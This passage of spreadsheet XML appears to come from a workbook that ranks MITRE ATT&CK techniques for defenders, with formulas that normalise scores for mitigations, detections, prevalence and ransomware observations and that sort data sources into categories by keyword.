      <c r="AF362" s="37">
        <v>358</v>
      </c>
      <c r="AG362" s="37" t="str" cm="1">
        <f t="array" ref="AG362">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD362)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH362" s="37">
        <v>358</v>
      </c>
      <c r="AI362" s="37" t="str" cm="1">
        <f t="array" ref="AI362">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD362)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ362" s="37">
        <v>358</v>
      </c>
      <c r="AK362" s="37" t="str" cm="1">
        <f t="array" ref="AK362">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD362)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL362" s="37">
        <v>358</v>
      </c>
      <c r="AM362" s="37" t="str" cm="1">
        <f t="array" ref="AM362">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD362)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN362" s="37">
        <v>0</v>
      </c>
      <c r="AO362" s="37"/>
      <c r="AP362" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ362" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>47.766666666666673</v>
      </c>
      <c r="AR362" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS362" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT362" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU36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63" spans="1:47" ht="102">
      <c r="A363" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B363" s="37">
        <f t="shared" si="5"/>
        <v>1421.7714267142858</v>
      </c>
      <c r="C363" s="37" t="s">
        <v>1271</v>
      </c>
      <c r="D363" s="50" t="s">
        <v>1272</v>
      </c>
      <c r="E363" s="37"/>
      <c r="F363" s="37">
        <v>7</v>
      </c>
      <c r="G363" s="37">
        <v>2</v>
      </c>
      <c r="H363" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.44999999999999996</v>
      </c>
      <c r="I363" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.7</v>
      </c>
      <c r="J363" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.7</v>
      </c>
      <c r="K363" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L363" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M363" s="37">
        <v>0.31083100000000002</v>
      </c>
      <c r="N363" s="56">
        <v>0</v>
      </c>
      <c r="O363" s="56">
        <v>6</v>
      </c>
      <c r="P363" s="56">
        <v>24</v>
      </c>
      <c r="Q363" s="56">
        <v>16</v>
      </c>
      <c r="R363" s="57"/>
      <c r="S363" s="57">
        <v>0</v>
      </c>
      <c r="T363" s="57"/>
      <c r="U363" s="57">
        <v>1</v>
      </c>
      <c r="V363" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.22857152380952381</v>
      </c>
      <c r="W363" s="37">
        <v>1</v>
      </c>
      <c r="X363" s="37">
        <v>1.8182E-2</v>
      </c>
      <c r="Y363" s="37">
        <v>1.8182E-2</v>
      </c>
      <c r="Z363" s="37">
        <v>46</v>
      </c>
      <c r="AA363" s="37">
        <v>0.46</v>
      </c>
      <c r="AB363" s="37">
        <v>0.46</v>
      </c>
      <c r="AC363" s="37"/>
      <c r="AD363" s="50" t="s">
        <v>1273</v>
      </c>
      <c r="AE363" s="37" t="str" cm="1">
        <f t="array" ref="AE363">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD363)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF363" s="37">
        <v>359</v>
      </c>
      <c r="AG363" s="37" t="str" cm="1">
        <f t="array" ref="AG363">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD363)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH363" s="37">
        <v>359</v>
      </c>
      <c r="AI363" s="37" t="str" cm="1">
        <f t="array" ref="AI363">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD363)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ363" s="37">
        <v>359</v>
      </c>
      <c r="AK363" s="37" t="str" cm="1">
        <f t="array" ref="AK363">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD363)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL363" s="37">
        <v>359</v>
      </c>
      <c r="AM363" s="37" t="str" cm="1">
        <f t="array" ref="AM363">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD363)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN363" s="37">
        <v>0</v>
      </c>
      <c r="AO363" s="37">
        <v>3</v>
      </c>
      <c r="AP363" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ363" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>473.92380890476193</v>
      </c>
      <c r="AR363" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS363" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT363" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU36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33.923129207482994</v>
      </c>
    </row>
    <row r="364" spans="1:47" ht="68">
      <c r="A364" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.53333333333333333</v>
      </c>
      <c r="B364" s="37">
        <f t="shared" si="5"/>
        <v>459.74761904761903</v>
      </c>
      <c r="C364" s="37" t="s">
        <v>1274</v>
      </c>
      <c r="D364" s="50" t="s">
        <v>1272</v>
      </c>
      <c r="E364" s="37" t="s">
        <v>1275</v>
      </c>
      <c r="F364" s="37">
        <v>1</v>
      </c>
      <c r="G364" s="37">
        <v>1</v>
      </c>
      <c r="H364" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I364" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J364" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K364" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L364" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M364" s="37">
        <v>0</v>
      </c>
      <c r="N364" s="56">
        <v>4</v>
      </c>
      <c r="O364" s="56">
        <v>31</v>
      </c>
      <c r="P364" s="56">
        <v>9</v>
      </c>
      <c r="Q364" s="56">
        <v>2</v>
      </c>
      <c r="R364" s="57"/>
      <c r="S364" s="57">
        <v>0</v>
      </c>
      <c r="T364" s="57"/>
      <c r="U364" s="57">
        <v>0</v>
      </c>
      <c r="V364" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.21904761904761905</v>
      </c>
      <c r="W364" s="37">
        <v>0</v>
      </c>
      <c r="X364" s="37">
        <v>0</v>
      </c>
      <c r="Y364" s="37">
        <v>0</v>
      </c>
      <c r="Z364" s="37">
        <v>46</v>
      </c>
      <c r="AA364" s="37">
        <v>0.46</v>
      </c>
      <c r="AB364" s="37">
        <v>0.46</v>
      </c>
      <c r="AC364" s="37"/>
      <c r="AD364" s="50" t="s">
        <v>1276</v>
      </c>
      <c r="AE364" s="37" t="str" cm="1">
        <f t="array" ref="AE364">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD364)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF364" s="37">
        <v>360</v>
      </c>
      <c r="AG364" s="37" t="str" cm="1">
        <f t="array" ref="AG364">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD364)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH364" s="37">
        <v>360</v>
      </c>
      <c r="AI364" s="37" t="str" cm="1">
        <f t="array" ref="AI364">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD364)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ364" s="37">
        <v>360</v>
      </c>
      <c r="AK364" s="37" t="str" cm="1">
        <f t="array" ref="AK364">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD364)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL364" s="37">
        <v>360</v>
      </c>
      <c r="AM364" s="37" t="str" cm="1">
        <f t="array" ref="AM364">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD364)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN364" s="37">
        <v>0</v>
      </c>
      <c r="AO364" s="37">
        <v>7</v>
      </c>
      <c r="AP364" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.53333333333333333</v>
      </c>
      <c r="AQ364" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>153.24920634920633</v>
      </c>
      <c r="AR364" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS364" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AT364" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AU36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25.708201058201055</v>
      </c>
    </row>
    <row r="365" spans="1:47" ht="51">
      <c r="A365" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B365" s="37">
        <f t="shared" si="5"/>
        <v>261.47639690476188</v>
      </c>
      <c r="C365" s="37" t="s">
        <v>1277</v>
      </c>
      <c r="D365" s="50" t="s">
        <v>1272</v>
      </c>
      <c r="E365" s="37" t="s">
        <v>1278</v>
      </c>
      <c r="F365" s="37">
        <v>1</v>
      </c>
      <c r="G365" s="37">
        <v>1</v>
      </c>
      <c r="H365" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I365" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J365" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K365" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L365" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M365" s="37">
        <v>0</v>
      </c>
      <c r="N365" s="56">
        <v>0</v>
      </c>
      <c r="O365" s="56">
        <v>1</v>
      </c>
      <c r="P365" s="56">
        <v>2</v>
      </c>
      <c r="Q365" s="56">
        <v>0</v>
      </c>
      <c r="R365" s="57" t="s">
        <v>1279</v>
      </c>
      <c r="S365" s="57">
        <v>2</v>
      </c>
      <c r="T365" s="57" t="s">
        <v>1280</v>
      </c>
      <c r="U365" s="57">
        <v>5</v>
      </c>
      <c r="V365" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>8.0952523809523808E-2</v>
      </c>
      <c r="W365" s="37">
        <v>7</v>
      </c>
      <c r="X365" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y365" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z365" s="37">
        <v>3</v>
      </c>
      <c r="AA365" s="37">
        <v>0.03</v>
      </c>
      <c r="AB365" s="37">
        <v>0.03</v>
      </c>
      <c r="AC365" s="37"/>
      <c r="AD365" s="50" t="s">
        <v>1281</v>
      </c>
      <c r="AE365" s="37" t="str" cm="1">
        <f t="array" ref="AE365">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD365)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF365" s="37">
        <v>361</v>
      </c>
      <c r="AG365" s="37" t="str" cm="1">
        <f t="array" ref="AG365">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD365)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH365" s="37">
        <v>361</v>
      </c>
      <c r="AI365" s="37" t="str" cm="1">
        <f t="array" ref="AI365">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD365)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ365" s="37">
        <v>361</v>
      </c>
      <c r="AK365" s="37" t="str" cm="1">
        <f t="array" ref="AK365">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD365)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL365" s="37">
        <v>361</v>
      </c>
      <c r="AM365" s="37" t="str" cm="1">
        <f t="array" ref="AM365">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD365)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN365" s="37">
        <v>0</v>
      </c>
      <c r="AO365" s="37">
        <v>0</v>
      </c>
      <c r="AP365" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ365" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>87.158798968253961</v>
      </c>
      <c r="AR365" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS365" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT365" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU36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66" spans="1:47" ht="51">
      <c r="A366" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B366" s="37">
        <f t="shared" si="5"/>
        <v>386.39993099999992</v>
      </c>
      <c r="C366" s="37" t="s">
        <v>1282</v>
      </c>
      <c r="D366" s="50" t="s">
        <v>1272</v>
      </c>
      <c r="E366" s="37" t="s">
        <v>1283</v>
      </c>
      <c r="F366" s="37">
        <v>1</v>
      </c>
      <c r="G366" s="37">
        <v>1</v>
      </c>
      <c r="H366" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I366" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J366" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K366" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L366" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M366" s="37">
        <v>0</v>
      </c>
      <c r="N366" s="56">
        <v>0</v>
      </c>
      <c r="O366" s="56">
        <v>1</v>
      </c>
      <c r="P366" s="56">
        <v>1</v>
      </c>
      <c r="Q366" s="56">
        <v>1</v>
      </c>
      <c r="R366" s="57" t="s">
        <v>501</v>
      </c>
      <c r="S366" s="57">
        <v>6</v>
      </c>
      <c r="T366" s="57" t="s">
        <v>1284</v>
      </c>
      <c r="U366" s="57">
        <v>10</v>
      </c>
      <c r="V366" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.16666661904761904</v>
      </c>
      <c r="W366" s="37">
        <v>16</v>
      </c>
      <c r="X366" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Y366" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Z366" s="37">
        <v>3</v>
      </c>
      <c r="AA366" s="37">
        <v>0.03</v>
      </c>
      <c r="AB366" s="37">
        <v>0.03</v>
      </c>
      <c r="AC366" s="37"/>
      <c r="AD366" s="50" t="s">
        <v>1241</v>
      </c>
      <c r="AE366" s="37" t="str" cm="1">
        <f t="array" ref="AE366">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD366)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF366" s="37">
        <v>362</v>
      </c>
      <c r="AG366" s="37" t="str" cm="1">
        <f t="array" ref="AG366">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD366)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH366" s="37">
        <v>362</v>
      </c>
      <c r="AI366" s="37" t="str" cm="1">
        <f t="array" ref="AI366">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD366)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ366" s="37">
        <v>362</v>
      </c>
      <c r="AK366" s="37" t="str" cm="1">
        <f t="array" ref="AK366">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD366)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL366" s="37">
        <v>362</v>
      </c>
      <c r="AM366" s="37" t="str" cm="1">
        <f t="array" ref="AM366">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD366)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN366" s="37">
        <v>0</v>
      </c>
      <c r="AO366" s="37">
        <v>0</v>
      </c>
      <c r="AP366" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ366" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>128.79997699999998</v>
      </c>
      <c r="AR366" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS366" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT366" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU36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67" spans="1:47" ht="51">
      <c r="A367" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B367" s="37">
        <f t="shared" si="5"/>
        <v>470.49509971428574</v>
      </c>
      <c r="C367" s="37" t="s">
        <v>1285</v>
      </c>
      <c r="D367" s="50" t="s">
        <v>1272</v>
      </c>
      <c r="E367" s="37" t="s">
        <v>1286</v>
      </c>
      <c r="F367" s="37">
        <v>1</v>
      </c>
      <c r="G367" s="37">
        <v>1</v>
      </c>
      <c r="H367" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I367" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J367" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K367" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L367" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M367" s="37">
        <v>0</v>
      </c>
      <c r="N367" s="56">
        <v>2</v>
      </c>
      <c r="O367" s="56">
        <v>3</v>
      </c>
      <c r="P367" s="56">
        <v>0</v>
      </c>
      <c r="Q367" s="56">
        <v>0</v>
      </c>
      <c r="R367" s="57" t="s">
        <v>1287</v>
      </c>
      <c r="S367" s="57">
        <v>8</v>
      </c>
      <c r="T367" s="57" t="s">
        <v>1288</v>
      </c>
      <c r="U367" s="57">
        <v>13</v>
      </c>
      <c r="V367" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.22380942857142858</v>
      </c>
      <c r="W367" s="37">
        <v>21</v>
      </c>
      <c r="X367" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y367" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z367" s="37">
        <v>5</v>
      </c>
      <c r="AA367" s="37">
        <v>0.05</v>
      </c>
      <c r="AB367" s="37">
        <v>0.05</v>
      </c>
      <c r="AC367" s="37"/>
      <c r="AD367" s="50" t="s">
        <v>1281</v>
      </c>
      <c r="AE367" s="37" t="str" cm="1">
        <f t="array" ref="AE367">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD367)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF367" s="37">
        <v>363</v>
      </c>
      <c r="AG367" s="37" t="str" cm="1">
        <f t="array" ref="AG367">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD367)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH367" s="37">
        <v>363</v>
      </c>
      <c r="AI367" s="37" t="str" cm="1">
        <f t="array" ref="AI367">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD367)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ367" s="37">
        <v>363</v>
      </c>
      <c r="AK367" s="37" t="str" cm="1">
        <f t="array" ref="AK367">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD367)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL367" s="37">
        <v>363</v>
      </c>
      <c r="AM367" s="37" t="str" cm="1">
        <f t="array" ref="AM367">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD367)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN367" s="37">
        <v>0</v>
      </c>
      <c r="AO367" s="37">
        <v>0</v>
      </c>
